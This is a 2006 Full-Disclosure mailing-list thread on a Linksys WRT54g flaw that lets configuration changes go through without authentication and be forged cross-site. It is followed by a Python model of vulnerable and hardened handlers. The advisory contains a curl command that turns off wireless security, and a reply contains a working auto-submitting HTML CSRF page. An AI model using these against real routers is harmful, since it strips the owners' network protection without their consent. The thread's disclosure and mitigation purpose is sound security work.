Date: Fri, 10 Nov 2006 15:04:56 -0800
From: "Rob Thompson" <my.security.lists@...il.com>
To: pagvac <unknown.pentester@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, Ginsu Rabbit <ginsurabbit@...mail.com>
Subject: Re: linksys WRT54g authentication bypass

The firmware listed in the post is a very old firmware and should no
longer be affected if you update to the more current release of
4.71.1.

Also, I would recommend checking out Thibor's release instead.  It's a
much more robust release.

http://www.thibor.co.uk

Hope that this helps out a little bit.

Rob.

On 11/4/06, pagvac <unknown.pentester@...il.com> wrote:
> Sorry I'm replying to this post after so long, but I was bored this
> morning and decided to create a specially-crafted HTML page that would
> allow me to replicate the unauth CSRF attack described by Ginsu
> Rabbit. Very interesting vuln btw :-)
>
> The following is the code for the specially-crafted HTML page.
> Unfortunately, I do not have a vulnerable Linksys router to test this,
> so I simply strictly followed the structure of the POST request as
> described in the advisory. Hopefully it should work.
>
> It'd be cool if someone could test this against a vulnerable model.
>
> Here is an on-line copy:
>
> http://ikwt.com/projects/linksys/BID19347_test.html
>
>
> <html>
>
> <head><title>BID 19347 specially-crafted html page - vuln found by
> Ginsu Rabbit</title></head>
>
> <body>
>
> <form action="http://192.168.0.1/Security.tri" method="POST">
> <input type="hidden" name="SecurityMode" value="0">
> <input type="hidden" name="layout" value="en">
> </form>
>
> <script>document.forms[0].submit();</script>
>
> </body>
> </html>
>
> On 8/4/06, Ginsu Rabbit <ginsurabbit@...mail.com> wrote:
> > I'm having some trouble believing this hasn't been reported before.  If you
> > have a linksys router handy, please check to see whether it is vulnerable to
> > this attack.  It's possible that all of the linksys router web UIs have the
> > same bug.  Hopefully the problem is isolated to one particular model or
> > firmware revision.
> >
> > I. DESCRIPTION
> >
> > Tested product: Linksys WRT54g home router, firmware revision 1.00.9.
> >
> > Problem #1: No password validation for configuration settings.
> >
> > The WRT54g does not attempt to verify a username and password when
> > configuration settings are being changed.  If you wish to read configuration
> > settings, you must provide the administrator ID and password via HTTP basic
> > authentication.  No similar check is done for configuration changes.
> >
> > This request results in a user-id and password prompt:
> > GET /wireless.htm
> >
> > This request disables wireless security on the router, with no password
> > prompt:
> > POST /Security.tri
> > Content-Length: 24
> >
> > SecurityMode=0&layout=en
> >
> > Problem #2: Cross-site request forgery
> >
> > The web administration console does not verify that the request to change
> > the router configuration is being made with the consent of the
> > administrator.  Any web site can force a browser to send a request to the
> > linksys router, and the router will accept the request.
> >
> >
> > II. EXPLOITATION
> >
> > The combination of these two bugs means that any internet web site can
> > change the configuration of your router.  Recently published techniques for
> > port-scanning and web server fingerprinting via java and javascript make
> > this even easier.  The attack scenario is as follows:
> >
> > - intranet user visits a malicious web site
> > - malicious web site returns specially crafted HTML page
> > - intranet user's browser automatically sends a request to the router that
> > enables the remote administration interface
> > - the owner of the malicious web site now has complete access to your router
> >
> > I'm not going to share the "specially crafted HTML page" at this time, but
> > it isn't all that special.
> >
> >
> > III. DETECTION
> >
> > If your router is vulnerable, the following curl command will disable
> > wireless security on your router.  Tests for other router models and
> > firmware revisions may be different:
> >
> > curl -d "SecurityMode=0&layout=en" http://192.168.0.1/Security.tri
> >
> >
> > IV. MITIGATION
> >
> > 1) Make sure you've disabled the remote administration feature of your
> > router.  If you have this "feature" enabled, anybody on the internet can
> > take control of the router.
> >
> > 2) Change the IP address of the router to a random value, preferably in the
> > range assigned to private networks.  For example, change the IP address to
> > 10.x.y.z, where x, y, and z are numbers between 0 and 255 inclusive.  This
> > makes it more difficult for an attacker to forge the request necessary to
> > change the router configuration.  This mitigation technique might not help
> > much if you have a java-enabled browser, because of recently published
> > techniques for determining gateway addresses via java applets.
> >
> > 3) Disable HTTP access to the administration interface of the router,
> > allowing only HTTPS access.  Under most circumstances, this will cause the
> > browser to show a certificate warning before the configuration is changed.
> >
> > V. VENDOR NOTIFICATION
> >
> > Linksys customer support was notified on June 24, 2006.
> > Full disclosure on August 4, 2006.
> >
> > --
> > GR
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> --
> pagvac
> [http://ikwt.com/]
>
>
>
>
>


-- 
Rob

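The two bugs Ginsu Rabbit describes (Problem #1, no credential check on the configuration POST; Problem #2, no check that the request was made with the administrator's consent) and the way pagvac's auto-submitting form drives them are modelled below as a small request handler, with a hardened handler beside it. This is an added example, not Linksys firmware and not code from anyone in the thread; the admin credentials, the SecurityMode values, the csrf_token parameter and the attacker hostname are assumptions made for the demonstration. The hardened version also shows why closing Problem #1 on its own would not stop the PoC page: a browser that has previously authenticated to the router replays the cached Basic-auth credentials on a cross-site form post, so a state-changing request must additionally be tied to an Origin/Referer from the router and to a token that only a page served by the router can know.

```python
"""Model of the WRT54g authorisation/CSRF weakness from the advisory.

Added example; not Linksys code. Requests are plain (method, path, headers,
body) tuples and router state is a dict, so everything runs offline.
"""
import base64
import hmac
import secrets
from urllib.parse import parse_qs

# Assumed values for the example only.
ADMIN_USER = "admin"
ADMIN_PASS = "admin"
ROUTER_ORIGIN = "http://192.168.0.1"


def basic_auth_ok(headers):
    """Validate an HTTP Basic Authorization header against the admin account."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Basic "):
        return False
    try:
        user, _, password = base64.b64decode(auth[6:]).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return False
    return hmac.compare_digest(user, ADMIN_USER) and hmac.compare_digest(password, ADMIN_PASS)


def new_state():
    """Router state: wireless security on (mode "2" is a constructed value) plus a
    per-session anti-CSRF token that only a page served by the router can read."""
    return {"SecurityMode": "2", "csrf_token": secrets.token_hex(16)}


def vulnerable_handle(method, path, headers, body, state):
    """Behaviour the advisory describes: the read (GET /wireless.htm) demands
    credentials, the write (POST /Security.tri) does not, and nothing checks
    where the request came from."""
    if method == "GET" and path == "/wireless.htm":
        if not basic_auth_ok(headers):
            return 401, "Authorization Required"
        return 200, "SecurityMode=" + state["SecurityMode"]
    if method == "POST" and path == "/Security.tri":
        params = parse_qs(body)
        if "SecurityMode" in params:
            state["SecurityMode"] = params["SecurityMode"][0]  # applied with no auth at all
        return 200, "OK"
    return 404, "Not Found"


def hardened_handle(method, path, headers, body, state):
    """Same endpoints with both bugs closed: credentials on every request, and a
    state-changing POST must also (a) carry an Origin or Referer from the router
    itself and (b) echo the session's CSRF token in the body."""
    if not basic_auth_ok(headers):
        return 401, "Authorization Required"
    if method == "GET" and path == "/wireless.htm":
        return 200, "SecurityMode=" + state["SecurityMode"]
    if method == "POST" and path == "/Security.tri":
        source = headers.get("Origin") or headers.get("Referer") or ""
        # Exact match for Origin, prefix-with-slash for Referer; the "/" stops
        # http://192.168.0.1.attacker.example from passing.
        if not (source == ROUTER_ORIGIN or source.startswith(ROUTER_ORIGIN + "/")):
            return 403, "Cross-site request rejected"
        params = parse_qs(body)
        token = params.get("csrf_token", [""])[0]
        if not hmac.compare_digest(token, state["csrf_token"]):
            return 403, "Missing or invalid CSRF token"
        if "SecurityMode" in params:
            state["SecurityMode"] = params["SecurityMode"][0]
        return 200, "OK"
    return 404, "Not Found"


def forged_request(browser_has_cached_creds):
    """What the auto-submitting form in the thread makes a victim's browser send.
    Origin/Referer name the attacker's page (constructed hostname); if the victim
    logged in to the router earlier, the browser attaches those credentials too."""
    headers = {"Origin": "http://attacker.example",
               "Referer": "http://attacker.example/BID19347_test.html"}
    if browser_has_cached_creds:
        headers["Authorization"] = "Basic " + base64.b64encode(b"admin:admin").decode()
    return "POST", "/Security.tri", headers, "SecurityMode=0&layout=en"


def legitimate_request(state):
    """The same change made from the router's own admin page, token included."""
    headers = {"Origin": ROUTER_ORIGIN,
               "Authorization": "Basic " + base64.b64encode(b"admin:admin").decode()}
    body = "SecurityMode=0&layout=en&csrf_token=" + state["csrf_token"]
    return "POST", "/Security.tri", headers, body


def run_scenarios():
    """Drive both handlers; returns the resulting SecurityMode for each case."""
    results = {}
    s = new_state()
    vulnerable_handle(*forged_request(False), s)
    results["vulnerable, forged, no creds"] = s["SecurityMode"]
    s = new_state()
    hardened_handle(*forged_request(False), s)
    results["hardened, forged, no creds"] = s["SecurityMode"]
    s = new_state()
    hardened_handle(*forged_request(True), s)
    results["hardened, forged, cached creds"] = s["SecurityMode"]
    s = new_state()
    hardened_handle(*legitimate_request(s), s)
    results["hardened, legitimate"] = s["SecurityMode"]
    return results


if __name__ == "__main__":
    for case, mode in run_scenarios().items():
        print(f"{case}: SecurityMode={mode}")
```

Run with python3: the vulnerable handler sets SecurityMode=0 with no credentials at all, while the hardened one rejects the forged post both without credentials (401) and with the browser's cached credentials (403, failed origin check), and accepts only the request built from the router's own page. The token is the primary control; the Origin/Referer check is defence in depth, since privacy proxies and some browser configurations strip Referer and older browsers never sent Origin.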
